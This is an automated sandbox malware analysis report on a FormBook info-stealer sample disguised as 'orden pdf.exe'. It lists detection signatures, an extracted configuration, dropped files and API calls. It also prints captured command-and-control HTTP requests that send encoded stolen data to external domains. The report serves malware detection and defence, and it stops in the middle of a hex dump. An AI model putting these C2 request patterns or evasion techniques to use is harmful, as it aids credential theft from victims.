Analysis Report orden pdf.exe

Overview

General Information

Sample Name: orden pdf.exe
Analysis ID: 339334
MD5: 4f1ad14256cc9c420d78d69b468bab48
SHA1: 7734beec32b17c6ef0678533cc9634bd2c890c65
SHA256: 1f05b369246b2867a66aba3cacd9da9c2f29c03adc4d45883c91054c35ac3345
Tags: exe

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 2.2.orden pdf.exe.400000.1.raw.unpack Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x998f", "KEY1_OFFSET 0x1db82", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1dc80", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1c7b3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xcc1048c5", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0122d4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01445", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe ReversingLabs: Detection: 32%
Multi AV Scanner detection for submitted file
Source: orden pdf.exe Virustotal: Detection: 50% Perma Link
Source: orden pdf.exe ReversingLabs: Detection: 32%
Yara detected FormBook
Source: Yara match File source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.orden pdf.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.orden pdf.exe.39e0000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: orden pdf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: Binary string: systray.pdb source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: orden pdf.exe
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_001B6CA9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_001B60DD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_001B63F9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_001BEB60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BF56F FindFirstFileW,FindClose, 0_2_001BF56F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_001BF5FA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C1B2F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C1C8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 1_2_001B60DD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 1_2_001B63F9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_001BEB60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_001B6CA9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BF56F FindFirstFileW,FindClose, 1_2_001BF56F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_001BF5FA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_001C1B2F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_001C1C8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_001C1F94

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 4x nop then pop edi 2_2_00416D4E

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.unbelievabowboutique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n7ak/?rN=MxLeMLg7J3XdambF4+q7RpqtyYrbwIYxF5p89mR13ayzWNjROKSjcDea1OeFglLEscbA&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.bepbosch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.hydrabadproperties.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View IP Address: 34.102.136.180 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.bepbosch.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.bepbosch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bepbosch.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 4e 3d 45 54 48 6b 53 75 63 2d 4a 31 62 5f 59 68 4c 49 6e 4b 54 7a 4f 66 66 4b 37 4e 7a 50 32 38 5a 33 55 35 49 59 34 45 5a 55 28 62 32 7a 48 66 6a 37 48 59 72 77 59 6a 44 43 6a 65 53 34 69 55 62 6b 73 75 65 79 31 79 76 37 74 46 44 63 73 57 67 49 44 50 43 73 61 50 74 4a 6d 4e 4c 61 36 39 35 74 37 44 58 76 38 70 78 34 6d 57 43 6a 58 6b 51 32 39 7a 43 63 66 54 4f 35 5a 4a 50 5a 4d 39 45 32 35 66 55 4b 43 41 7e 2d 68 34 54 4e 51 32 6c 36 37 6a 68 5f 79 4a 79 72 46 48 50 69 54 49 6a 46 4b 51 7a 38 71 78 38 45 68 68 46 41 33 57 5a 63 4b 72 30 6c 48 64 36 51 57 66 58 34 72 6d 4c 31 54 5a 75 5f 48 77 78 4b 45 54 51 30 53 4b 48 74 62 61 6d 37 33 34 68 30 53 48 34 6a 36 56 67 32 61 74 6b 43 7e 50 28 7a 74 76 32 2d 70 7a 63 69 79 56 64 39 35 77 73 6b 64 6a 4a 38 5a 4e 32 55 4e 52 6f 34 64 4a 34 61 62 36 71 55 51 66 70 62 51 4b 44 52 52 4d 46 6c 6f 6c 7e 2d 36 47 4c 5a 6a 31 28 75 6d 51 6c 38 6e 2d 56 5f 47 65 31 54 69 61 63 6e 64 6e 56 57 76 37 37 52 37 68 48 61 50 58 44 48 6d 5a 6d 71 37 6f 54 35 4a 5a 6f 47 36 4e 49 68 72 50 30 55 55 6d 47 64 52 73 79 49 63 51 65 4e 59 2d 37 67 71 47 41 5f 62 4e 5a 2d 45 43 37 61 28 30 4e 31 72 67 4b 37 4e 67 54 4c 74 4c 67 53 54 75 7a 72 65 6f 46 75 48 2d 49 58 59 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: rN=ETHkSuc-J1b_YhLInKTzOffK7NzP28Z3U5IY4EZU(b2zHfj7HYrwYjDCjeS4iUbksuey1yv7tFDcsWgIDPCsaPtJmNLa695t7DXv8px4mWCjXkQ29zCcfTO5ZJPZM9E25fUKCA~-h4TNQ2l67jh_yJyrFHPiTIjFKQz8qx8EhhFA3WZcKr0lHd6QWfX4rmL1TZu_HwxKETQ0SKHtbam734h0SH4j6Vg2atkC~P(ztv2-pzciyVd95wskdjJ8ZN2UNRo4dJ4ab6qUQfpbQKDRRMFlol~-6GLZj1(umQl8n-V_Ge1TiacndnVWv77R7hHaPXDHmZmq7oT5JZoG6NIhrP0UUmGdRsyIcQeNY-7gqGA_bNZ-EC7a(0N1rgK7NgTLtLgSTuzreoFuH-IXYw).
Source: global traffic HTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.bepbosch.comConnection: closeContent-Length: 194340Cache-Control: no-cacheOrigin: http://www.bepbosch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bepbosch.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 4e 3d 45 54 48 6b 53 73 38 41 4b 47 33 55 4b 48 62 4c 6d 65 33 4e 45 38 47 58 77 71 4b 4c 31 72 63 4d 58 75 34 49 34 46 4a 51 6e 76 7a 30 57 73 37 37 42 62 44 7a 52 6a 44 46 71 2d 53 37 70 30 58 63 79 4a 71 36 31 7a 72 46 74 46 62 62 6c 33 51 4e 44 5f 43 64 62 76 52 31 6b 4f 32 4f 36 5f 63 46 37 6c 33 33 32 4d 70 34 69 6d 62 6c 62 68 31 6b 36 33 53 44 59 54 53 47 4a 34 6d 4e 4d 4e 6f 65 28 38 70 6e 56 77 4f 38 6d 4b 50 57 4f 6d 56 53 28 77 52 73 73 4a 6d 67 4c 68 66 78 63 50 54 42 4a 56 65 66 70 77 38 46 39 68 4e 30 39 30 42 36 61 4a 59 79 55 39 4c 68 57 65 53 46 6e 33 32 7a 5a 2d 75 33 42 42 39 73 50 43 6c 79 4f 4c 48 44 51 34 50 64 31 34 51 6b 65 6c 77 34 7e 47 6b 5a 62 66 4d 73 6b 61 71 46 68 2d 36 69 69 69 73 77 77 44 52 31 37 77 64 38 54 41 70 72 43 4d 57 4c 4d 54 45 4f 44 5a 35 4f 64 36 71 75 49 4d 42 76 55 39 62 61 48 4d 30 70 69 47 75 76 7e 58 6e 6c 6b 33 37 32 6f 52 6c 50 6d 4e 4e 6a 4e 4e 38 6b 70 62 59 75 65 56 4a 54 38 37 37 58 74 54 28 52 50 58 44 4c 6d 59 6d 41 37 5a 48 35 4a 49 49 76 36 75 67 74 28 5f 31 55 57 32 57 62 49 72 53 68 63 51 57 4e 65 63 69 50 72 78 55 5f 52 5f 52 39 46 67 54 61 7a 6b 4e 31 67 41 4c 6e 4f 54 71 45 76 34 63 58 41 49 50 4b 66 4d 5a 34 54 4e 56 54 4a 46 53 75 6e 47 62 76 65 32 30 44 6b 6c 69 57 46 6c 42 78 34 4d 6a 33 72 5a 43 6b 64 6a 6c 43 50 32 71 31 56 32 49 4a 76 68 4c 72 35 4a 68 34 47 6e 75 72 71 34 63 73 4f 4f 39 75 76 59 68 45 6d 74 36 5a 49 73 59 30 55 5a 49 71 73 54 4b 66 78 70 51 5a 4f 75 62 49 67 6b 6a 41 61 79 67 57 67 48 65 4e 34 4b 6a 39 54 45 4d 72 52 75 76 79 30 4b 49 49 76 6e 6f 61 50 50 75 53 52 61 42 37 61 58 62 58 76 36 68 4e 46 31 59 46 7a 56 6c 37 42 69 7e 61 42 4c 70 4a 52 32 73 6e 61 59 7a 68 45 30 38 66 49 70 57 51 50 4c 28 76 5a 39 33 51 5a 77 38 4c 79 64 37 41 41 57 37 43 6e 33 41 7a 65 6e 76 32 6a 70 76 70 73 55 6e 6d 45 64 6d 38 57 58 79 39 4a 66 57 5f 64 51 75 5f 65 47 68 36 76 2d 76 41 37 4c 66 43 37 2d 59 51 69 65 7a 73 32 42 65 44 38 41 37 43 6b 4b 68 43 67 2d 34 69 47 78 61 57 4b 32 30 58 43 6d 30 31 78 37 61 4b 5a 71 57 49 36 41 38 4b 61 51 61 4c 43 73 54 41 45 52 67 6e 34 42 6c 63 38 31 74 42 28 6a 4e 67 57 6a 48 76 57 37 73 73 67 78 31 68 56 78 4b 50 4d 5a 75 6f 52 4d 52 59 48 68 35 49 4b 50 79 42 45 36 56 58 41 6e 43 66 48 64 52 4a 75 39 4b 6e 50 49 43 62 62 74 4c 54 4d 6c 58 61 56 78 31 6d 7e 73 70 7a 66 68 35 46 70 4c 4e 38 6a 39 44 4e 66 54 59 49 65 67 74 6a 30 73 4c 70 70 51 58 4e 59 57 6e 73 56 34 57 59 35 6a 4c 4c 4d 64 33 39 4f 45 42 57 4d 77 70 51 57 48 47 79 67 33 59 69 53 63 72 70 41 47 65 35 52 6d 63 6a 4a 55 34 41 4c 47 54 6d 6f 73 6c 4b 55 72 75 52 54 53 43
Source: global traffic HTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.hydrabadproperties.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.hydrabadproperties.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hydrabadproperties.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 4e 3d 49 47 4d 43 45 55 34 57 78 4b 30 47 47 67 58 33 33 55 65 77 34 4a 76 30 6a 51 65 59 49 4b 6b 66 4a 53 46 4a 78 4a 7a 6b 31 6b 38 38 79 4d 79 38 65 64 48 46 4d 76 59 50 43 4c 52 31 6f 38 66 59 53 2d 6b 74 6c 6b 69 59 64 49 42 65 65 33 4b 76 6a 63 69 4d 78 66 58 31 43 4a 6e 41 5a 52 66 5a 4a 72 51 5a 4e 45 78 4a 6e 72 30 37 4f 7a 66 43 54 30 58 69 53 39 5a 77 4d 59 6c 76 75 68 38 43 42 4a 30 41 72 37 6b 61 51 4b 68 6f 36 75 28 77 62 6b 72 41 28 69 38 54 71 57 7a 43 34 34 38 46 4e 6c 44 58 47 66 69 2d 6e 72 62 48 4a 44 38 6e 61 39 48 30 6e 45 4d 66 6f 66 34 64 7e 44 7a 63 37 47 52 54 57 76 34 32 4e 79 59 4f 4e 30 57 59 6e 37 6c 6f 4e 36 70 77 66 6f 52 48 68 55 44 41 4d 35 34 44 4a 4e 56 6a 4e 37 7e 6a 4c 64 5a 65 32 39 75 52 57 6f 6a 67 79 36 6b 31 46 6a 73 50 79 61 49 61 64 65 65 72 49 43 6b 4a 76 6c 69 59 6b 75 76 44 38 6d 67 65 65 71 67 57 4f 30 41 36 61 54 4b 6e 35 65 76 50 28 34 38 44 65 48 64 61 4c 47 49 6e 41 4f 50 6b 50 64 6f 76 38 50 30 68 4b 74 74 36 32 6c 69 62 4c 42 57 66 37 53 42 58 70 56 6d 62 69 66 6a 43 4d 77 51 5a 4d 32 59 51 77 72 51 74 41 56 45 73 39 50 39 65 4d 4b 4f 5f 63 5f 4e 37 42 61 46 50 6e 4e 56 4a 4c 6c 79 37 48 70 6f 30 47 34 4c 70 69 38 71 6b 49 77 4e 71 71 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: rN=IGMCEU4WxK0GGgX33Uew4Jv0jQeYIKkfJSFJxJzk1k88yMy8edHFMvYPCLR1o8fYS-ktlkiYdIBee3KvjciMxfX1CJnAZRfZJrQZNExJnr07OzfCT0XiS9ZwMYlvuh8CBJ0Ar7kaQKho6u(wbkrA(i8TqWzC448FNlDXGfi-nrbHJD8na9H0nEMfof4d~Dzc7GRTWv42NyYON0WYn7loN6pwfoRHhUDAM54DJNVjN7~jLdZe29uRWojgy6k1FjsPyaIadeerICkJvliYkuvD8mgeeqgWO0A6aTKn5evP(48DeHdaLGInAOPkPdov8P0hKtt62libLBWf7SBXpVmbifjCMwQZM2YQwrQtAVEs9P9eMKO_c_N7BaFPnNVJLly7Hpo0G4Lpi8qkIwNqqw).
Source: global traffic HTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.hydrabadproperties.comConnection: closeContent-Length: 194340Cache-Control: no-cacheOrigin: http://www.hydrabadproperties.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hydrabadproperties.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 4e 3d 49 47 4d 43 45 56 77 73 7a 38 6f 54 43 53 44 36 6c 33 6d 47 7a 71 48 71 79 68 28 47 42 39 4a 73 4a 46 56 6a 78 49 43 74 39 46 73 75 68 38 69 38 59 66 76 38 41 76 59 51 4a 72 52 30 73 38 54 73 62 4e 55 6c 6c 6e 76 31 64 49 35 5a 51 56 53 6d 74 73 69 68 33 5f 62 5a 45 4a 44 62 5a 58 66 38 4a 4a 38 42 49 45 39 4a 71 5f 59 35 54 69 76 5a 51 31 62 54 4d 39 46 6f 4f 61 6c 32 75 52 52 39 42 72 49 69 73 36 34 50 48 4d 70 5a 31 4f 4f 76 4b 44 58 46 7a 53 6f 59 76 52 6a 52 32 37 5a 4d 41 45 44 6c 44 65 69 35 6c 62 43 45 4d 44 74 61 51 70 32 4b 6d 55 51 4c 6f 63 59 6a 35 31 54 33 28 48 42 74 55 65 31 64 5a 32 41 4d 43 6e 28 62 77 70 4d 65 50 37 35 50 58 4c 46 69 6c 46 76 77 41 63 6c 65 4e 63 4e 78 43 70 61 76 53 34 6c 71 31 73 71 4a 61 49 7a 50 6f 4c 74 39 4c 51 6c 43 31 59 45 33 43 75 65 49 4f 43 6b 46 67 46 79 4f 68 5a 28 49 37 56 49 38 59 61 59 50 4c 6b 73 47 57 77 28 6b 33 64 32 35 34 4d 4a 52 56 55 56 49 4a 67 6f 75 42 65 37 50 4a 64 6f 31 76 64 73 6f 4b 74 74 2d 32 67 50 4d 4d 67 43 66 37 43 67 54 70 79 37 61 6b 66 69 59 4f 6b 30 62 61 55 4d 41 77 74 34 74 42 6b 30 47 73 75 35 65 4a 5a 6d 34 66 64 6c 37 4d 4b 46 50 72 74 55 6e 59 31 61 7a 4c 4c 6f 30 44 4a 79 52 68 61 62 77 64 53 56 76 39 5a 4e 5a 6f 5f 32 76 77 33 78 4e 4b 50 7a 55 4c 6e 39 49 6b 4a 42 6c 4a 70 55 68 72 53 66 4f 72 6f 6b 43 67 32 73 6e 64 77 6b 73 6b 74 4b 6f 45 70 38 54 